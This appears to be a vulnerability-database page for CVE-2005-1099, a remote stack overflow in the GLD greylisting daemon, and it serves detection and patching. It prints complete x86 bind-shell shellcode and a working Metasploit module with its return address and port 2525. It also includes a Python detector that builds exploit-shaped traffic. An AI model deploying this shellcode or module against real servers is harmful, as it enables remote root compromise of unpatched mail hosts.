CVE-2005-1099
Published 2005-04-12 · Priority P2 (62) · CVSS 2.0 base score 10.0 (critical), vector AV:N/AC:L/Au:N/C:C/I:C/A:C · public exploit available · EPSS 67.66% (99.2th percentile)
Multiple buffer overflows in the HandleChild function in server.c in Greylisting daemon (GLD) 1.3 and 1.4, when GLD is listening on a network interface, allow remote attackers to execute arbitrary code.
Affected
7 ranges indexed (the six salim_gasmi entries carry no version data and are collapsed into one row)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | postfix-gld | < 1.5-1 (bookworm) | postfix-gld 1.5-1 (bookworm) |
| salim_gasmi | gld | 1.3 and 1.4 per the CVE description; no range recorded | — |
Detection & IOCs (extracted from the indexed sources)
Shellcode bytes carried by the indexed exploit (x86 Linux bind shell; the sockaddr_in.sin_port word it stores is 0x9000, i.e. TCP 36864):
\xeb\x72\x5e\x29\xc0\x89\x46\x10\x40\x89\xc3\x89\x46\x0c\x40\x89\x46\x08\x8d\x4e\x08\xb0\x66\xcd\x80\x43\xc6\x46\x10\x10\x66\x89\x5e\x14\x88\x46\x08\x29\xc0\x89\xc2\x89\x46\x18\xb0\x90\x66\x89\x46\x16\x8d\x4e\x14\x89\x4e\x0c\x8d\x4e\x08\xb0\x66\xcd\x80\x89\x5e\x0c\x43\x43\xb0\x66\xcd\x80\x89\x56\x0c\x89\x56\x10\xb0\x66\x43\xcd\x80\x86\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0\x3f\x41\xcd\x80\xb0\x3f\x41\xcd\x80\x88\x56\x07\x89\x76\x0c\x87\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80\xe8\x89\xff\xff\xff/bin/sh
- The exploit targets TCP port 2525, the port the GLD greylisting daemon listens on. Monitor for unexpected or malformed connections to this port, especially from hosts other than the Postfix server GLD serves.
- The payload is delivered in a `sender=` field, followed by a `client_address=` field padded with 300 repetitions of a return address. Detect anomalously large or malformed GLD protocol messages containing these fields.
- Successful exploitation yields a bind shell listening on TCP port 36864, the port encoded in the shellcode above. Monitor for unexpected listening sockets and inbound connections on port 36864 on the GLD host.
- The exploit's bad characters for payload encoding are the null byte, newline, carriage return, space and equals sign, so the encoded payload contains none of them. IDS signatures can look for long runs of binary (non-printable) bytes in GLD protocol fields.
- The vulnerability lies in the HandleChild function in server.c of GLD 1.3 and 1.4. Process-level monitoring for crashes of, or unexpected child processes spawned by, the GLD daemon is advised.
- The vulnerability is only exploitable when GLD is configured to listen on a network interface. Default or localhost-only deployments are not remotely exploitable.
- The Metasploit module has a single target, RedHat Linux 7.0 (Guinness), with a hardcoded return address (0xbfffa5d8). Exploitation against other distributions requires an adjusted return address.
- Debian fixes this in postfix-gld 1.5-1. Ensure the patched version is deployed.
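The detection points above in working form, as an added example that is not code from this page, from GLD, from Postfix or from the indexed exploit: a Python analyser for the Postfix policy-delegation requests GLD reads on TCP 2525. It runs over two constructed requests, a benign greylisting lookup and one laid out the way the Metasploit module builds its buffer (the page's shellcode in `sender=`, 0xbfffa5d8 repeated 300 times in `client_address=`), and it also recovers the bind-shell port from the IOC shellcode bytes to confirm the 36864 figure. The attribute names other than `sender` and `client_address`, the thresholds, the sample addresses and the function names are assumptions made for the example.

```python
"""Heuristic detector for exploitation attempts against GLD's policy port.

Added example for this page; not code from GLD, Postfix or the indexed
exploit. GLD consumes Postfix's policy-delegation request format (one
name=value attribute per line, terminated by an empty line). The checks flag
what the indexed module puts on the wire: non-printable bytes (shellcode) in
a value, a long run of one repeated dword (the return-address sled), an
embedded /bin/sh, and oversized values. Thresholds are assumptions."""
import re
import struct

MAX_VALUE_LEN = 256    # assumption: no legitimate policy attribute is longer
MIN_SLED_REPEATS = 16  # assumption: 16 identical dwords in a row is never legitimate

# Shellcode bytes listed in the IOC section of this page (x86 Linux bind shell).
GLD_BIND_SHELLCODE = (
    b"\xeb\x72\x5e\x29\xc0\x89\x46\x10\x40\x89\xc3\x89\x46\x0c\x40\x89\x46"
    b"\x08\x8d\x4e\x08\xb0\x66\xcd\x80\x43\xc6\x46\x10\x10\x66\x89\x5e\x14"
    b"\x88\x46\x08\x29\xc0\x89\xc2\x89\x46\x18\xb0\x90\x66\x89\x46\x16\x8d"
    b"\x4e\x14\x89\x4e\x0c\x8d\x4e\x08\xb0\x66\xcd\x80\x89\x5e\x0c\x43\x43"
    b"\xb0\x66\xcd\x80\x89\x56\x0c\x89\x56\x10\xb0\x66\x43\xcd\x80\x86\xc3"
    b"\xb0\x3f\x29\xc9\xcd\x80\xb0\x3f\x41\xcd\x80\xb0\x3f\x41\xcd\x80\x88"
    b"\x56\x07\x89\x76\x0c\x87\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80\xe8\x89\xff"
    b"\xff\xff/bin/sh"
)

# Constructed sample traffic, not captured data.
BENIGN_REQUEST = (
    b"request=smtpd_access_policy\nprotocol_state=RCPT\n"
    b"sender=alice@example.com\nrecipient=bob@example.net\n"
    b"client_address=192.0.2.10\n\n"
)
# Layout the indexed Metasploit module sends: payload in sender=, then
# client_address= padded with the RedHat 7.0 return address 0xbfffa5d8 x300.
# The raw shellcode already avoids the module's bad chars, so it stands in
# for payload.encoded here.
EXPLOIT_REQUEST = (
    b"sender=" + GLD_BIND_SHELLCODE + b"\r\n"
    + b"client_address=" + struct.pack("<I", 0xBFFFA5D8) * 300 + b"\r\n"
)


def parse_policy_request(raw: bytes) -> dict:
    """Split a request into {name: value}; stop at the terminating blank line.
    Lines with no '=' are collected under a synthetic key so malformed input
    is still visible to the checks."""
    attrs = {}
    for line in raw.split(b"\n"):
        line = line.rstrip(b"\r")
        if line == b"":
            break
        name, sep, value = line.partition(b"=")
        if not sep:
            attrs[b"<malformed>"] = attrs.get(b"<malformed>", b"") + line
        else:
            attrs[name] = value
    return attrs


def longest_dword_run(value: bytes) -> int:
    """Longest run of one repeated 4-byte word at any alignment; 'ret' * N
    padding produces a run of N."""
    best = 0
    for align in range(4):
        prev, run = None, 0
        for i in range(align, len(value) - 3, 4):
            word = value[i:i + 4]
            run = run + 1 if word == prev else 1
            prev = word
            best = max(best, run)
    return best


def analyze_request(raw: bytes) -> list:
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings = []
    for name, value in parse_policy_request(raw).items():
        label = name.decode("ascii", "replace")
        if len(value) > MAX_VALUE_LEN:
            findings.append(f"{label}: value of {len(value)} bytes exceeds {MAX_VALUE_LEN}")
        if re.search(rb"[^\x20-\x7e]", value):
            findings.append(f"{label}: non-printable bytes (possible shellcode)")
        run = longest_dword_run(value)
        if run >= MIN_SLED_REPEATS:
            findings.append(f"{label}: same dword repeated x{run} (return-address sled)")
        if b"/bin/sh" in value:
            findings.append(f"{label}: embedded /bin/sh")
    return findings


def bind_port_from_shellcode(sc: bytes):
    """Recover the port this shellcode family binds: eax is zeroed, then
    'mov al, imm8; mov [esi+0x16], ax' stores sockaddr_in.sin_port, so the
    port is imm8 << 8. Assumes that is the only port-setting sequence;
    returns None if it is absent."""
    m = re.search(rb"\xb0(.)\x66\x89\x46\x16", sc, re.DOTALL)
    return m.group(1)[0] << 8 if m else None


if __name__ == "__main__":
    for tag, req in (("benign", BENIGN_REQUEST), ("exploit", EXPLOIT_REQUEST)):
        print(tag, analyze_request(req) or "clean")
    print("bind shell port:", bind_port_from_shellcode(GLD_BIND_SHELLCODE))
```

Run directly it prints the findings for both requests; the same `analyze_request` check can sit behind a port-2525 tap or a policy-server proxy. The checks are heuristic: a legitimate policy request has no reason to carry non-printable bytes, a repeated dword or `/bin/sh`, so those three are near-zero false-positive, while the length threshold is the one knob to tune against your own traffic.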
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| osv | — | 10.0 | CRITICAL | — |
| vendor_debian | — | 10.0 | CRITICAL | — |
Debian
CVE-2005-1099: postfix-gld - Multiple buffer overflows in the HandleChild function in server.c in Greylisting daemon (GLD)
vendor_debian · 2005 · CVSS 10.0 · CRITICAL
Scope: local
bookworm: resolved (fixed in 1.5-1)
bullseye: resolved (fixed in 1.5-1)
forky: resolved (fixed in 1.5-1)
sid: resolved (fixed in 1.5-1)
trixie: resolved (fixed in 1.5-1)
GHSA
GHSA-7vr7-48qp-h7jp: Multiple buffer overflows in the HandleChild function in server.c
ghsa_unreviewed · 2022-05-01 · HIGH
OSV
CVE-2005-1099: Multiple buffer overflows in the HandleChild function in server.c
osv · 2005-04-12 · CVSS 10.0 · CRITICAL
No detection rules found.
Exploit-DB
Salim Gasmi GLD (Greylisting Daemon) - Postfix Buffer Overflow (Metasploit)
exploitdb · 2010-07-03 · CVE-2005-1099
---
```ruby
##
# $Id: gld_postfix.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'GLD (Greylisting Daemon) Postfix Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the Salim Gasmi
        GLD <= 1.4 greylisting daemon for Postfix. By sending an overly long
        string the stack can be overwritten.
      },
      'Version'        => '$Revision: 9669 $',
      'Author'         => [ 'patrick' ],
      'Arch'           => ARCH_X86,
      'Platform'       => 'linux',
      'References'     =>
        [
          [ 'CVE', '2005-1099' ],
          [ 'OSVDB', '15492' ],
          [ 'BID', '13129' ],
          [ 'URL', 'http://www.milw0rm.com/exploits/934' ],
        ],
      # The indexed copy of this revision stops here; the remaining options
      # (Payload, Targets, RPORT 2525) and the exploit method are the same as
      # in the 2005 revision of the module indexed below.
```
Exploit-DB
Salim Gasmi GLD (Greylisting Daemon) 1.x - Postfix Greylisting Daemon Buffer Overflow
exploitdb · 2005-04-12 · CVE-2005-1099
---
// source: https://www.securityfocus.com/bid/13129/info
It is reported that GLD contains a buffer overflow vulnerability. This issue is due to a failure of the application to properly ensure that a fixed-size memory buffer is sufficiently large prior to copying user-supplied input data into it.
Remote attackers may exploit this vulnerability to cause arbitrary machine code to be executed in the context of the affected service. As the service is designed to be run as the superuser, remote attackers may gain superuser privileges on affected computers.
GLD version 1.4 is reportedly affected, but prior versions may also be affected.
```c
/*
**
**
** 0x82-meOw-linuxer_forever - gld 1.4 remote overflow for
```
Exploit-DB
Salim Gasmi GLD (Greylisting Daemon) 1.0 < 1.4 - Postfix Greylisting Buffer Overflow (Metasploit)
exploitdb · 2005-04-12 · CVE-2005-1099
---
```ruby
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'GLD (Greylisting Daemon) Postfix Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack overflow in the Salim Gasmi
        GLD <= 1.4 greylisting daemon for Postfix. By sending an overly long
        string the stack can be overwritten.
      },
      'Version'        => '$Revision$',
      'Author'         => [ 'patrick' ],
      'Arch'           => ARCH_X86,
      'Platform'       => 'linux',
      'References'     =>
        [
          [ 'CVE', '2005-1099' ],
          [ 'OSVDB', '15492' ],
          [ 'BID', '13129' ],
          [ 'URL', 'http://www.milw0rm.com/exploits/934' ],
        ],
      'Privileged'     => true,
      'License'        => MSF_LICENSE,
      'Payload'        =>
        {
          'Space'    => 1000,
          'BadChars' => "\x00\x0a\x0d\x20=",
          'StackAdjustment' => -3500,
        },
      'Targets'        =>
        [
          [ 'RedHat Linux 7.0 (Guinness)', { 'Ret' => 0xbfffa5d8 } ],
        ],
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        Opt::RPORT(2525)
      ],
      self.class
    )
  end

  def exploit
    connect

    # The encoded payload rides in the sender= field; client_address= is then
    # padded with the target's return address repeated 300 times so that the
    # overwritten saved return address points back into the stack where the
    # payload sits (the Ret value is specific to the RedHat 7.0 target).
    sploit = "sender="+ payload.encoded + "\r\n"
    sploit << "client_address=" + [target.ret].pack('V') * 300 + "\r\n"

    print_status("Trying target #{target.name}...")
    sock.put(sploit)

    handler
    disconnect
  end

end
```
Metasploit
GLD (Greylisting Daemon) Postfix Buffer Overflow
metasploit
This module exploits a stack buffer overflow in the Salim Gasmi GLD <= 1.4 greylisting daemon for Postfix. By sending an overly long string the stack can be overwritten.
No writeups or analysis indexed.
References
- http://marc.info/?l=bugtraq&m=111339935903880&w=2
- http://marc.info/?l=bugtraq&m=111342432325670&w=2
- http://secunia.com/advisories/14941
- http://security.gentoo.org/glsa/glsa-200504-10.xml
- http://securitytracker.com/alerts/2005/Apr/1013678.html
- http://www.gasmi.net/down/gld-history
- http://www.osvdb.org/15492
- https://exchange.xforce.ibmcloud.com/vulnerabilities/20066
Published: 2005-04-12